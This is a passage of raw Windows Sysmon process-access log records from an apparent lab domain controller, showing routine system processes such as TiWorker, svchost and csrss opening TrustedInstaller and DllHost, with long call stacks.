1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011597Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.336{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011596Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.336{59A5CD1D-8E46-6005-1600-00000000A301}15442288C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0905-00000000A301}4240C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011595Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.336{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0905-00000000A301}4240C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011594Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.336{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011593Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.320{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011592Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.320{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0905-00000000A301}4240C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011591Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.320{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT
4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011590Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.320{59A5CD1D-93F6-6005-E604-00000000A301}48883504C:\Windows\system32\csrss.exe{59A5CD1D-9407-6005-0905-00000000A301}4240C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000011589Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.320{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 
10341000x800000000000000011588Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.320{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9407-6005-0905-00000000A301}4240C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000011587Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.320{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0905-00000000A301}4240C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011586Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.320{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011585Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.320{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011584Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.320{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011583Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.305{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011582Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.305{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011581Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.305{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011580Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.289{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011579Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.273{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011578Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.273{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011577Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.258{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|